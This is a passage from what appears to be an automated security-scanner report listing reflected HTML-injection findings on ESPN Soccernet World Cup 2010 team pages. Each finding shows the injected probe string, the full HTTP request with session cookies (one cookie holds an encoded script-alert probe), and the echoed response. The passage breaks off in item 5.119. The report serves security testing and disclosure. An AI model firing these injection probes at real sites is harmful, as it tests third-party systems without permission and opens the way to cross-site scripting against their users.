Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:31 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Sat, 06 Nov 2010 23:12:31 GMT
Content-Length: 82120
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Australia Football
...[SNIP]...
<a href="/worldcup2010/team?team=628&f41f3"><a>62eb963c13c=1&_slug_=australia&f41f3">
...[SNIP]...

5.113. http://soccernet.espn.go.com/worldcup2010/team/_/team/656/cameroon [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/656/cameroon

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1812"><a>6cd9474c3cf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/656/cameroond1812"><a>6cd9474c3cf HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:15 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:15 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN34
Cache-Expires: Sat, 06 Nov 2010 23:13:15 GMT
Content-Length: 81962
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cameroon Football /
...[SNIP]...
<a href="/worldcup2010/team?team=656&_slug_=cameroond1812"><a>6cd9474c3cf&topId=801800&linktext=Cameroon+coach+Le+Guen+quits+after+loss">
...[SNIP]...

5.114. http://soccernet.espn.go.com/worldcup2010/team/_/team/656/cameroon [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/656/cameroon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74c3a"><a>f85413ba34c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/656/cameroon?74c3a"><a>f85413ba34c=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:27 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN15
Cache-Expires: Sat, 06 Nov 2010 23:12:27 GMT
Content-Length: 82070
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cameroon Football /
...[SNIP]...
<a href="/worldcup2010/team?team=656&74c3a"><a>f85413ba34c=1&_slug_=cameroon&74c3a">
...[SNIP]...

5.115. http://soccernet.espn.go.com/worldcup2010/team/_/team/657/nigeria [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/657/nigeria

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cf86"><a>41113cade21 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/657/nigeria2cf86"><a>41113cade21 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:33 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN08
Cache-Expires: Sat, 06 Nov 2010 23:33:33 GMT
Content-Length: 81727
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Nigeria Football /
...[SNIP]...
<a href="/worldcup2010/team?team=657&_slug_=nigeria2cf86"><a>41113cade21&topId=792890&linktext=Nigerian+goverment+won%27t+ban+team">
...[SNIP]...

5.116. http://soccernet.espn.go.com/worldcup2010/team/_/team/657/nigeria [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/657/nigeria

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ac97"><a>0764b8f72c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/657/nigeria?8ac97"><a>0764b8f72c=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:25:13 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:25:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN22
Cache-Expires: Sat, 06 Nov 2010 23:30:13 GMT
Content-Length: 81827
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Nigeria Football /
...[SNIP]...
<a href="/worldcup2010/team?team=657&8ac97"><a>0764b8f72c=1&_slug_=nigeria&8ac97">
...[SNIP]...

5.117. http://soccernet.espn.go.com/worldcup2010/team/_/team/660/united-states [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/660/united-states

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bac12"><a>f4a7d4b1647 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/660/united-statesbac12"><a>f4a7d4b1647 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:29:25 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:29:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN03
Cache-Expires: Sat, 06 Nov 2010 23:34:25 GMT
Content-Length: 82134
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>United States Footb
...[SNIP]...
<a href="/worldcup2010/team?team=660&_slug_=united-statesbac12"><a>f4a7d4b1647&topId=802760&linktext=Ghana+advance+after+beating+USA+2-1">
...[SNIP]...

5.118. http://soccernet.espn.go.com/worldcup2010/team/_/team/660/united-states [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/660/united-states

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e57e"><a>f7a6114e7ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/660/united-states?3e57e"><a>f7a6114e7ef=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:55 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN01
Cache-Expires: Sat, 06 Nov 2010 23:33:55 GMT
Content-Length: 82242
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>United States Footb
...[SNIP]...
<a href="/worldcup2010/team?team=660&3e57e"><a>f7a6114e7ef=1&_slug_=united-states&3e57e">
...[SNIP]...

5.119. http://soccernet.espn.go.com/worldcup2010/team/_/team/6757/serbia [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/6757/serbia

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70663"><a>50054d97128 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/6757/serbia70663"><a>50054d97128 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:19 GMT
Content-Type: text/html; charset=iso-8859-1
